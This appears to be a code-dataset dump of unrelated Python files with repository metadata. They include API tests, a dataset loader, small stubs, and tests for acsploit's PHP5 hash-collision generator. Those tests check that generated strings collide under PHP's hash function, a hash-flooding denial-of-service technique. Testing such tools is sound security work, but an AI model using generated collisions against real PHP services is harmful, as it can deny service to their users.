os.system("wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=11Oy2IEfkeIgA0s5VZTZ4c3obg5A_IQDq' -O nchs_mortality.txt") | 58 | 144 | 0.793103 | 25 | 174 | 5.44 | 0.96 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054217 | 0.045977 | 174 | 3 | 144 | 58 | 0.76506 | 0.103448 | 0 | 0 | 0 | 0.5 | 0.839744 | 0.141026 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
d1d868b5a4368c6a2ef8be2c04bffb54cf8b3684 | 40 | py | Python | week1/ass1.py | aniruddh09/aniruddh09 | e2977a87169b9267d4d0069d83d51989a2c989f4 | [
"MIT"
] | null | null | null | week1/ass1.py | aniruddh09/aniruddh09 | e2977a87169b9267d4d0069d83d51989a2c989f4 | [
"MIT"
] | null | null | null | week1/ass1.py | aniruddh09/aniruddh09 | e2977a87169b9267d4d0069d83d51989a2c989f4 | [
"MIT"
] | null | null | null | import numpy as np
print(np.arange(10))
| 13.333333 | 20 | 0.75 | 8 | 40 | 3.75 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 0.125 | 40 | 2 | 21 | 20 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
ae24daf838fa800d4aaabf09b14bada24c33684b | 3,170 | py | Python | tests/test_recipes_endpoint.py | iwpnd/toponym-api | 5810837dc11fd9b50cd45e4abe2b673fd3cd5cf6 | [
"MIT"
] | 1 | 2020-01-25T22:53:08.000Z | 2020-01-25T22:53:08.000Z | tests/test_recipes_endpoint.py | iwpnd/toponym-api | 5810837dc11fd9b50cd45e4abe2b673fd3cd5cf6 | [
"MIT"
] | null | null | null | tests/test_recipes_endpoint.py | iwpnd/toponym-api | 5810837dc11fd9b50cd45e4abe2b673fd3cd5cf6 | [
"MIT"
] | null | null | null | import json
import pytest
from starlette.status import HTTP_200_OK
from starlette.status import HTTP_404_NOT_FOUND
from toponym import settings
from toponym_api.core.config import API_V1_STR
def is_json(myjson):
try:
json.loads(myjson)
except ValueError:
return False
return True
@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_recipes_language_route(test_app, language):
response = test_app.get(API_V1_STR + f"/recipes/{language}")
assert response.status_code == HTTP_200_OK
@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_recipes_language_route_valid_json(test_app, language):
response = test_app.get(API_V1_STR + f"/recipes/{language}")
assert is_json(response.content)
@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_recipes_language_route_default_in_json(test_app, language):
response = test_app.get(API_V1_STR + f"/recipes/{language}")
assert "_default" in response.json()["recipes"]
def test_recipes_language_route_language_fails(test_app):
language = "test"
response = test_app.get(API_V1_STR + f"/recipes/{language}")
assert response.status_code == HTTP_404_NOT_FOUND
assert f"Language: {language} not found" in response.json()["detail"]
@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_language_ending_route_status(test_app, language):
response = test_app.get(API_V1_STR + f"/recipes/{language}/_default")
assert response.status_code == HTTP_200_OK
@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_language_ending_route_response_keys(test_app, language):
response = test_app.get(API_V1_STR + f"/recipes/{language}/_default")
assert all([k in response.json() for k in ["language", "ending", "recipe"]])
def test_language_ending_route_language_404(test_app):
language = "fails"
response = test_app.get(API_V1_STR + f"/recipes/{language}/_default")
assert response.status_code == HTTP_404_NOT_FOUND
assert f"Language: {language} not found" in response.json()["detail"]
def test_language_ending_route_ending_404(test_app):
response = test_app.get(API_V1_STR + f"/recipes/polish/_test")
assert response.status_code == HTTP_404_NOT_FOUND
assert "Ending not found" in response.json()["detail"]
@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_recipe_route_status(test_app, language):
payload = {"language": language, "word": "test"}
response = test_app.post(API_V1_STR + f"/recipes/recipe", json=payload)
assert response.status_code == HTTP_200_OK
@pytest.mark.parametrize("language", [language for language in settings.LANGUAGE_DICT])
def test_recipe_route_response(test_app, language):
payload = {"language": language, "word": "test"}
response = test_app.post(API_V1_STR + f"/recipes/recipe", json=payload)
assert all(
[k in response.json() for k in ["language", "word", "longest_ending", "recipe"]]
)
| 38.192771 | 88 | 0.753312 | 446 | 3,170 | 5.067265 | 0.132287 | 0.061947 | 0.038938 | 0.039823 | 0.830089 | 0.764159 | 0.764159 | 0.764159 | 0.764159 | 0.729204 | 0 | 0.014877 | 0.130599 | 3,170 | 82 | 89 | 38.658537 | 0.805152 | 0 | 0 | 0.448276 | 0 | 0 | 0.14795 | 0.033123 | 0 | 0 | 0 | 0 | 0.224138 | 1 | 0.189655 | false | 0 | 0.103448 | 0 | 0.327586 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ae38bf6661f9a9fbd5711cc61c59042cfea56af8 | 56 | py | Python | drllib/__init__.py | the0demiurge/Deep-Reinforcement-Learning | d68113ad33afa12aff8fbb036b7240caf22ac1aa | [
"Apache-2.0"
] | 1 | 2020-01-01T02:50:11.000Z | 2020-01-01T02:50:11.000Z | drllib/__init__.py | the0demiurge/Deep-Reinforcement-Learning | d68113ad33afa12aff8fbb036b7240caf22ac1aa | [
"Apache-2.0"
] | null | null | null | drllib/__init__.py | the0demiurge/Deep-Reinforcement-Learning | d68113ad33afa12aff8fbb036b7240caf22ac1aa | [
"Apache-2.0"
] | 1 | 2020-07-10T13:26:20.000Z | 2020-07-10T13:26:20.000Z | from drllib.dqn import DQN
from drllib.ddpg import DDPG
| 18.666667 | 28 | 0.821429 | 10 | 56 | 4.6 | 0.5 | 0.434783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 56 | 2 | 29 | 28 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ae588ef24413bd791624d7e32118f3c7246cd384 | 41 | py | Python | openpharmacophore/tests/test_extractors.py | dprada/OpenPharmacophore | bfcf4bdafd586b27a48fd5d1f13614707b5e55a8 | [
"MIT"
] | 1 | 2022-03-18T08:22:04.000Z | 2022-03-18T08:22:04.000Z | openpharmacophore/tests/test_extractors.py | dprada/OpenPharmacophore | bfcf4bdafd586b27a48fd5d1f13614707b5e55a8 | [
"MIT"
] | null | null | null | openpharmacophore/tests/test_extractors.py | dprada/OpenPharmacophore | bfcf4bdafd586b27a48fd5d1f13614707b5e55a8 | [
"MIT"
] | null | null | null | def test_dbscan_pharmacophore():
pass | 20.5 | 32 | 0.780488 | 5 | 41 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146341 | 41 | 2 | 33 | 20.5 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
ae6d1604db059d4fb3adee391c10d46b71e6018c | 2,486 | py | Python | test/exploits/hashes/collisions/test_php5_fast.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 107 | 2018-05-03T16:53:01.000Z | 2022-02-23T14:47:20.000Z | test/exploits/hashes/collisions/test_php5_fast.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 7 | 2019-04-28T00:41:35.000Z | 2021-05-04T20:35:54.000Z | test/exploits/hashes/collisions/test_php5_fast.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 16 | 2019-03-29T12:39:16.000Z | 2021-03-03T11:09:45.000Z | from exploits.hashes.collisions import php5_fast
from exploits.hashes.collisions import php5_common
from test.exploits.dummy_output import DummyOutput
from input.chars import CharGenerator
def test_run_small_collision_count():
output = DummyOutput()
n_collisions = 20
hash_table_size = 2**32
target = '42'
php5_fast.options['n_collisions'] = n_collisions
php5_fast.options['n_substrings'] = 10
php5_fast.options['target_type'] = 'image'
php5_fast.options['target'] = target
php5_fast.options['hash_table_size'] = hash_table_size
php5_fast.run(CharGenerator(), output)
assert output.count() == n_collisions
for i in output:
assert php5_common.php_hash(i, hash_table_size) == int(target)
def test_run_large_collision_count():
output = DummyOutput()
n_collisions = 10000
hash_table_size = 2**32
target = '42'
php5_fast.options['n_collisions'] = n_collisions
php5_fast.options['n_substrings'] = 10
php5_fast.options['target_type'] = 'image'
php5_fast.options['target'] = target
php5_fast.options['hash_table_size'] = hash_table_size
php5_fast.run(CharGenerator(), output)
assert output.count() == n_collisions
for i in output:
assert php5_common.php_hash(i, hash_table_size) == int(target)
def test_preimage():
output = DummyOutput()
n_collisions = 10
hash_table_size = 2**32
preimage_target = 'hello world'
php5_fast.options['n_collisions'] = n_collisions
php5_fast.options['n_substrings'] = 10
php5_fast.options['target_type'] = 'preimage'
php5_fast.options['target'] = preimage_target
php5_fast.options['hash_table_size'] = hash_table_size
php5_fast.run(CharGenerator(), output)
target = php5_common.php_hash(preimage_target, hash_table_size)
assert output.count() == n_collisions
for i in output:
assert php5_common.php_hash(i, hash_table_size) == target
def test_run_small_hash_table_size():
output = DummyOutput()
n_collisions = 10
hash_table_size = 1024
target = '42'
php5_fast.options['n_collisions'] = n_collisions
php5_fast.options['target_type'] = 'image'
php5_fast.options['n_substrings'] = 3
php5_fast.options['target'] = target
php5_fast.options['hash_table_size'] = hash_table_size
php5_fast.run(CharGenerator(), output)
assert output.count() == n_collisions
for i in output:
assert php5_common.php_hash(i, hash_table_size) == int(target)
| 35.514286 | 70 | 0.718021 | 339 | 2,486 | 4.935103 | 0.138643 | 0.119546 | 0.179319 | 0.076509 | 0.835625 | 0.827256 | 0.73162 | 0.73162 | 0.680215 | 0.662283 | 0 | 0.033122 | 0.174175 | 2,486 | 69 | 71 | 36.028986 | 0.781783 | 0 | 0 | 0.721311 | 0 | 0 | 0.106195 | 0 | 0 | 0 | 0 | 0 | 0.131148 | 1 | 0.065574 | false | 0 | 0.065574 | 0 | 0.131148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ae75cb9b479d615092510f6e860e4ffe3e1bc225 | 122 | py | Python | tests/helpers/examples/__init__.py | sashgorokhov-forks/stories | ae0596cd1c6eb2b159bc652706d28ed934af1507 | [
"BSD-2-Clause"
] | null | null | null | tests/helpers/examples/__init__.py | sashgorokhov-forks/stories | ae0596cd1c6eb2b159bc652706d28ed934af1507 | [
"BSD-2-Clause"
] | null | null | null | tests/helpers/examples/__init__.py | sashgorokhov-forks/stories | ae0596cd1c6eb2b159bc652706d28ed934af1507 | [
"BSD-2-Clause"
] | null | null | null | # flake8: noqa
import examples.contract
import examples.failure_reasons
import examples.methods
import examples.shortcuts
| 20.333333 | 31 | 0.860656 | 15 | 122 | 6.933333 | 0.6 | 0.538462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0.090164 | 122 | 5 | 32 | 24.4 | 0.927928 | 0.098361 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8817a0a56a075ce4db5ff9093972a61547dc58f6 | 120 | py | Python | test/analytics.py | giuseppe/quay | a1b7e4b51974edfe86f66788621011eef2667e6a | [
"Apache-2.0"
] | 2,027 | 2019-11-12T18:05:48.000Z | 2022-03-31T22:25:04.000Z | test/analytics.py | giuseppe/quay | a1b7e4b51974edfe86f66788621011eef2667e6a | [
"Apache-2.0"
] | 496 | 2019-11-12T18:13:37.000Z | 2022-03-31T10:43:45.000Z | test/analytics.py | giuseppe/quay | a1b7e4b51974edfe86f66788621011eef2667e6a | [
"Apache-2.0"
] | 249 | 2019-11-12T18:02:27.000Z | 2022-03-22T12:19:19.000Z | class FakeMixpanel(object):
def track(*args, **kwargs):
pass
def init_app(app):
return FakeMixpanel()
| 15 | 31 | 0.641667 | 14 | 120 | 5.428571 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.233333 | 120 | 7 | 32 | 17.142857 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.2 | 0 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
8836e3140ef8e6fb7f5a02d3a686c043ebadcea3 | 133 | py | Python | Class04/test1.py | BinHan-Code/PythonNetClass | c63e89c74407e4f1706e163c90e9d117149561c9 | [
"Apache-2.0"
] | null | null | null | Class04/test1.py | BinHan-Code/PythonNetClass | c63e89c74407e4f1706e163c90e9d117149561c9 | [
"Apache-2.0"
] | null | null | null | Class04/test1.py | BinHan-Code/PythonNetClass | c63e89c74407e4f1706e163c90e9d117149561c9 | [
"Apache-2.0"
] | null | null | null |
print ("Hello")
print ("Hello")
print ("Hello")
def my_func()
print("my username")
print ("Hello")
print ("Hello")
my_func()
| 10.230769 | 24 | 0.616541 | 18 | 133 | 4.444444 | 0.333333 | 0.625 | 0.5625 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172932 | 133 | 12 | 25 | 11.083333 | 0.727273 | 0 | 0 | 0.625 | 0 | 0 | 0.272727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.75 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
ee01d8d0dbd498c44e3b91b511052f8f5d51d59b | 7,452 | py | Python | DataReader.py | sibirbil/SimpleKernels | 7fc4f5a784bb2256129874064f3fbf16ae5b4b4e | [
"MIT"
] | 1 | 2021-03-08T10:06:11.000Z | 2021-03-08T10:06:11.000Z | DataReader.py | sibirbil/SimpleKernels | 7fc4f5a784bb2256129874064f3fbf16ae5b4b4e | [
"MIT"
] | null | null | null | DataReader.py | sibirbil/SimpleKernels | 7fc4f5a784bb2256129874064f3fbf16ae5b4b4e | [
"MIT"
] | 1 | 2020-12-20T21:15:25.000Z | 2020-12-20T21:15:25.000Z | import os.path
import numpy as np
from sklearn.datasets import load_svmlight_file
from sklearn.model_selection import train_test_split
my_path = os.path.abspath("./DataSets")
#random state for the datasets, Spambase, Phoneme, Magic for which training and test parts are not provided
random_state=42
# *************************************************************************************
def Adult():
# X_train,y_train=train_Data[0],train_Data[1]
train_Data = load_svmlight_file(os.path.abspath("./DataSets") + "/LibSVMDataSets" + "/Adult_Training", 123, multilabel=False)
# X_test, y_test=test_Data[0],test_Data[1]
test_Data = load_svmlight_file(os.path.abspath("./DataSets") + "/LibSVMDataSets" + "/Adult_Test", 123, multilabel=False)
# X_train,X_test,y_train,y_test
return train_Data[0].toarray(), test_Data[0].toarray(), train_Data[1], test_Data[1]
# *************************************************************************************
def Spambase():
f = open(my_path + "/CIDatasets"+ "/Spambase.txt")
X, y = [], []
for line in f:
line = line.split(',')
y.append(int(line[-1]))
X.append([float(line[i]) for i in range(len(line) - 1) if line[i] != ''])
return train_test_split(np.array(X), np.array(y), test_size=0.3, random_state=random_state, stratify=np.array(y), shuffle=True)
# *************************************************************************************
def Magic():
f = open(my_path + "/CIDatasets"+ "/Magic.txt")
X, y = [], []
for line in f:
line = line.split(',')
y.append((line[-1][0]))
X.append([float(line[i]) for i in range(len(line) - 1) if line[i] != ''])
return train_test_split(np.array(X), np.array(y), test_size=0.3, random_state=random_state, stratify=np.array(y), shuffle=True)
# *************************************************************************************
def Phoneme():
f = open(my_path +"/CIDatasets"+ "/Phoneme.txt")
X, y = [], []
for line in f:
line = line.split(',')
y.append((line[-1]))
X.append([float(line[i]) for i in range(len(line) - 1) if line[i] != ''])
return train_test_split(np.array(X), np.array(y), test_size=0.3, random_state=random_state, stratify=np.array(y), shuffle=True)
# *************************************************************************************
def Guide1():
# X_train,y_train=train_Data[0],train_Data[1]
train_Data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Guide_1_Training.txt", 4, multilabel=False)
# X_test, y_test=test_Data[0],test_Data[1]
test_Data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Guide_1_Test.txt", 4, multilabel=False)
# X_train,X_test,y_train,y_test
return train_Data[0].toarray(), test_Data[0].toarray(), train_Data[1], test_Data[1]
# *************************************************************************************
def Wilt():
f = open(my_path + "/CIDatasets"+"/Wilt_Training.txt")
X_training, y_training = [], []
for line in f:
line = line.split(',')
y_training.append(line[0])
X_training.append(
[float(line[i]) for i in range(1, len(line)) if line[i] != '' and line[i] != '\n'])
f = open(my_path + "/CIDatasets"+"/Wilt_Test.txt")
X_test, y_test = [], []
for line in f:
line = line.split(',')
y_test.append(line[0])
X_test.append(
[float(line[i]) for i in range(1, len(line)) if line[i] != ' ' and line[i] != '\n'])
return np.array(X_training), np.array(X_test), np.array(y_training), np.array(y_test)
# *************************************************************************************
def Splice():
# X_train,y_train=train_Data[0],train_Data[1]
train_Data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Splice_Training.txt", 60, multilabel=False)
# X_test, y_test=test_Data[0],test_Data[1]
test_Data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Splice_Test.txt", 60, multilabel=False)
# X_train,X_test,y_train,y_test
return train_Data[0].toarray(), test_Data[0].toarray(), train_Data[1], test_Data[1]
# *************************************************************************************
def australian():
# X_train,y_train=train_Data[0],train_Data[1]
data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Australian", 14, multilabel=False)
# X,y
return data[0].toarray(), data[1]
# *************************************************************************************
def fourclass():
# X_train,y_train=train_Data[0],train_Data[1]
data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Fourclass", 2, multilabel=False)
# X,y
return data[0].toarray(), data[1]
# *************************************************************************************
def ionosphere():
f = open(my_path+ "/CIDatasets"+ "/Ionosphere.txt")
X, y = [], []
for line in f:
line = line.split(',')
y.append(line[-1].replace('\n', ''))
X.append([float(line[i]) for i in range(len(line) - 1) if line[i] != ' '])
return np.array(X), np.array(y)
# *************************************************************************************
def heart():
# X_train,y_train=train_Data[0],train_Data[1]
data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Heart.txt", 13, multilabel=False)
# X,y
return data[0].toarray(), data[1]
# *************************************************************************************
def pima():
# X_train,y_train=train_Data[0],train_Data[1]
data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Pima_Indians.txt", 8, multilabel=False)
# X,y
return data[0].toarray(), data[1]
# *************************************************************************************
def wprognostic():
f = open(my_path+ "/CIDatasets"+"/wisconsinPrognosis.txt")
X, y = [], []
for line in f:
line = line.split(',')
y.append(line[1].replace('\n', ''))
X.append([float(line[i]) for i in range(2,len(line)) if line[i] != ' '])
return np.array(X), np.array(y)
# *************************************************************************************
def bupa():
f = open(my_path +"/CIDatasets"+ "/BupaLiver.txt")
X, y = [], []
for line in f:
line = line.split(',')
y.append(int(line[-1].replace('\n', '')))
X.append([float(line[i]) for i in range(len(line) - 1) if line[i] != ' '])
return np.array(X), np.array(y)
# *************************************************************************************
def fertility():
f = open(my_path + "/CIDatasets"+"/Fertility.txt")
X, y = [], []
for line in f:
line = line.split(',')
y.append(line[-1])
X.append([float(line[i]) for i in range(0, len(line)-1) if line[i] != ' ' and line[i] != '\n'])
return np.array(X), np.array(y)
# *************************************************************************************
def wdiagnostic():
# X_train,y_train=train_Data[0],train_Data[1]
data = load_svmlight_file(my_path + "/LibSVMDataSets" + "/Winsconsin_Diagnonis.txt", 10, multilabel=False)
# X,y
return data[0].toarray(), data[1]
# *************************************************************************************
| 49.026316 | 132 | 0.490875 | 911 | 7,452 | 3.839737 | 0.102086 | 0.064322 | 0.054889 | 0.062893 | 0.80446 | 0.755289 | 0.738708 | 0.738708 | 0.718411 | 0.71498 | 0 | 0.015318 | 0.16774 | 7,452 | 151 | 133 | 49.350993 | 0.548694 | 0.288916 | 0 | 0.447619 | 0 | 0 | 0.118966 | 0.013113 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152381 | false | 0 | 0.038095 | 0 | 0.342857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ee4f2041058fddbb85901b3e0bc5c0e798a0b1d3 | 133 | py | Python | loggingpy/__init__.py | felfel/logging-py | 62e836da8f666286e190dfc1a4428eb04375d08c | [
"MIT"
] | 2 | 2018-08-24T12:45:56.000Z | 2020-02-23T07:59:34.000Z | loggingpy/__init__.py | felfel/logging-py | 62e836da8f666286e190dfc1a4428eb04375d08c | [
"MIT"
] | 6 | 2018-07-10T11:43:09.000Z | 2018-10-22T11:34:49.000Z | loggingpy/__init__.py | felfel/logging-py | 62e836da8f666286e190dfc1a4428eb04375d08c | [
"MIT"
] | 1 | 2018-07-13T09:32:58.000Z | 2018-07-13T09:32:58.000Z | from loggingpy.log import Logger, JsonFormatter # noqa F401
from loggingpy.sink import SimpleHttpSink, BundlingHttpSink # noqa F401
| 44.333333 | 71 | 0.827068 | 16 | 133 | 6.875 | 0.6875 | 0.236364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.051724 | 0.12782 | 133 | 2 | 72 | 66.5 | 0.896552 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ee83ad0a5316b19ddc0c2242de3e1b51d0396e0d | 104 | py | Python | django_tiny_util/__init__.py | olegbo/django-tiny-util | f76f91b99d33e2626b16c5f2a025d85a9f9160da | [
"MIT"
] | null | null | null | django_tiny_util/__init__.py | olegbo/django-tiny-util | f76f91b99d33e2626b16c5f2a025d85a9f9160da | [
"MIT"
] | null | null | null | django_tiny_util/__init__.py | olegbo/django-tiny-util | f76f91b99d33e2626b16c5f2a025d85a9f9160da | [
"MIT"
] | 1 | 2021-06-15T13:10:05.000Z | 2021-06-15T13:10:05.000Z | """
Copyright (c) 2020 Oleg Bogumirski <reg@olegb.ru>
"""
__author__ = "Oleg Bogumirski <reg@olegb.ru>"
| 20.8 | 49 | 0.692308 | 14 | 104 | 4.857143 | 0.642857 | 0.411765 | 0.5 | 0.647059 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043956 | 0.125 | 104 | 4 | 50 | 26 | 0.703297 | 0.471154 | 0 | 0 | 0 | 0 | 0.638298 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c9f3719d7c2903ce9e6e987ba9b9e12a7e643498 | 13 | py | Python | NoteBooks/Curso de Python/Python/Inputs-Outputs/Template/tempCodeRunnerFile.py | Alejandro-sin/Learning_Notebooks | 161d6bed4c7b1d171b45f61c0cc6fa91e9894aad | [
"MIT"
] | 1 | 2021-02-26T13:12:22.000Z | 2021-02-26T13:12:22.000Z | NoteBooks/Curso de Python/Python/Inputs-Outputs/Template/tempCodeRunnerFile.py | Alejandro-sin/Learning_Notebooks | 161d6bed4c7b1d171b45f61c0cc6fa91e9894aad | [
"MIT"
] | null | null | null | NoteBooks/Curso de Python/Python/Inputs-Outputs/Template/tempCodeRunnerFile.py | Alejandro-sin/Learning_Notebooks | 161d6bed4c7b1d171b45f61c0cc6fa91e9894aad | [
"MIT"
] | null | null | null | print('■'*30) | 13 | 13 | 0.538462 | 3 | 13 | 2.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 0 | 13 | 1 | 13 | 13 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
4e538202be04799450665071b5ad66a487222613 | 451 | py | Python | pymc3_models/__init__.py | Emaasit/pymc3_models | aa7244f4f058cffb1c75152976159603ed687c60 | [
"Apache-2.0"
] | 2 | 2018-10-05T01:29:25.000Z | 2018-10-11T01:44:42.000Z | pymc3_models/__init__.py | Emaasit/pymc3_models | aa7244f4f058cffb1c75152976159603ed687c60 | [
"Apache-2.0"
] | null | null | null | pymc3_models/__init__.py | Emaasit/pymc3_models | aa7244f4f058cffb1c75152976159603ed687c60 | [
"Apache-2.0"
] | null | null | null | __version__ = "1.1.3"
from pymc3_models.models.HierarchicalLogisticRegression import HierarchicalLogisticRegression
from pymc3_models.models.LinearRegression import LinearRegression
from pymc3_models.models.GaussianProcessRegression import GaussianProcessRegression
from pymc3_models.models.SparseGaussianProcessRegression import SparseGaussianProcessRegression
from pymc3_models.models.StudentsTProcessRegression import StudentsTProcessRegression
| 45.1 | 95 | 0.909091 | 39 | 451 | 10.282051 | 0.307692 | 0.112219 | 0.187032 | 0.261845 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018824 | 0.05765 | 451 | 9 | 96 | 50.111111 | 0.924706 | 0 | 0 | 0 | 0 | 0 | 0.011136 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.833333 | 0 | 0.833333 | 0 | 0 | 0 | 1 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
